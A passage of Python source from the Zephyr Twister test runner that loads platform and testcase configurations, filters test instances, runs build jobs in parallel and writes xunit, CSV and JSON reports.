"modules": {"type": "list", "default": []},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release",
"twister_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
self.retry_build_errors = False
self.suite_name_check = True
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.quarantine = {}
self.platforms = []
self.platform_names = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
# used during creating shorter build paths
self.link_dir_counter = 0
self.pipeline = None
self.version = "NA"
self.modules = []
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12", "--always"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None):
for instance in self.instances.values():
results.cases += len(instance.testcase.cases)
if instance.status == 'skipped':
results.skipped_filter += 1
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report, report_skipped):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version, report_skipped=report_skipped)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version, report_skipped=report_skipped)
self.csv_report(filename + ".csv")
if json_report:
self.json_report(filename + ".json", append=only_failed, version=self.version)
if platform_reports:
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.modules = tc_dict["modules"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
return len(self.testcases)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Loads quarantine list from the given yaml file. Creates a dictionary
of all tests configurations (platform + scenario: comment) that shall be
skipped due to quarantine
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = self.platform_names
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if "run_id" in row and row["run_id"] != "na":
instance.run_id = row["run_id"]
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
self.verify_platforms_existence(platform_filter, f"platform_filter")
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
if tc.build_on_all and not platform_filter:
platform_scope = self.platforms
elif tc.integration_platforms and self.integration:
self.verify_platforms_existence(
tc.integration_platforms, f"{tc_name} - integration_platforms")
platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and tc.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if tc.platform_allow and not platform_filter and not integration:
self.verify_platforms_existence(
tc.platform_allow, f"{tc_name} - platform_allow")
a = set(platform_scope)
b = set(filter(lambda item: item.name in tc.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in tc.platform_allow, \
self.platforms))
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if tc.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if tc.modules and self.modules:
if not set(tc.modules).issubset(set(self.modules)):
discards[instance] = discards.get(instance, f"one or more required module not available: {','.join(tc.modules)}")
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testcase.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all and not integration:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
# If integration mode is on all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testcase.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
instance.fill_results_by_status()
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "skipped"
instance.fill_results_by_status()
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
# Remove from discards configurations that must not be discarded (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False, retry_build_errors=False):
for instance in self.instances.values():
if build_only:
instance.run = False
no_retry_statuses = ['passed', 'skipped']
if not retry_build_errors:
no_retry_statuses.append("error")
if instance.status not in no_retry_statuses:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors,
suite_name_check=self.suite_name_check
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only,
retry_build_errors=self.retry_build_errors)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
return results
def discard_report(self, filename):
try:
if not self.discards:
raise TwisterRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False, report_skipped=True):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version, report_skipped=report_skipped)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA", report_skipped=True):
total = 0
fails = passes = errors = skips = 0
if platform:
selected = [platform]
logger.info(f"Writing target report for {platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
eleTestsuite = None
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
else:
logger.info(f"Did not find any existing results for {p}")
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
if not eleTestsuite or not eleTestsuite.findall(f'testcase/[@name="{k}"]'):
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
if instance.status:
logger.error(f"{instance.name}: Unknown status {instance.status}")
else:
logger.error(f"{instance.name}: No status")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
if not report_skipped and total == skips:
continue
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if eleTestsuite:
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % (skips + int(eleTestsuite.attrib['skipped']))
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
for _, instance in inst.items():
if instance.status == 'skipped' and not report_skipped:
continue
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message=instance.reason)
log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(log_root, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout", "flash_error"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(log_root, "build.log")
hl = os.path.join(log_root, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size", "run_id"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
try:
rowdict["run_id"] = instance.run_id
except AttributeError:
# No run_id available
rowdict["run_id"] = "na"
cw.writerow(rowdict)
def json_report(self, filename, append=False, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
selected = self.selected_platforms
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
json_data = {}
if os.path.exists(filename) and append:
with open(filename, 'r') as json_file:
json_data = json.load(json_file)
suites = json_data.get("testsuites", [])
if suites:
suite = suites[0]
testcases = suite.get("testcases", [])
else:
suite = {}
testcases = []
for p in selected:
inst = self.get_platform_instances(p)
for _, instance in inst.items():
testcase = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get ("ram_size", 0)
rom_size = instance.metrics.get("rom_size",0)
for k in instance.results.keys():
testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases ))
testcase = {"testcase": k,
"arch": instance.platform.arch,
"platform": p,
}
if ram_size:
testcase["ram_size"] = ram_size
if rom_size:
testcase["rom_size"] = rom_size
if instance.results[k] in ["SKIP"] or instance.status == 'skipped':
testcase["status"] = "skipped"
testcase["reason"] = instance.reason
elif instance.results[k] in ["PASS"] or instance.status == 'passed':
testcase["status"] = "passed"
if instance.handler:
testcase["execution_time"] = handler_time
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout", "flash_error"]:
testcase["status"] = "failed"
testcase["reason"] = instance.reason
testcase["execution_time"] = handler_time
if os.path.exists(handler_log):
testcase["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
testcase["device_log"] = self.process_log(device_log)
else:
testcase["build_log"] = self.process_log(build_log)
testcases.append(testcase)
suites = [ {"testcases": testcases} ]
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
"""
Verify if platform name (passed by --platform option, or in yaml file
as platform_allow or integration_platforms options) is correct. If not -
log and raise error.
"""
for platform in platform_names_to_verify:
if platform in self.platform_names:
break
else:
logger.error(f"{log_info} - unrecognized platform - {platform}")
sys.exit(2)
def create_build_dir_links(self):
"""
Iterate through all no-skipped instances in suite and create links
for each one build directories. Those links will be passed in the next
steps to the CMake command.
"""
links_dir_name = "twister_links" # folder for all links
links_dir_path = os.path.join(self.outdir, links_dir_name)
if not os.path.exists(links_dir_path):
os.mkdir(links_dir_path)
for instance in self.instances.values():
if instance.status != "skipped":
self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
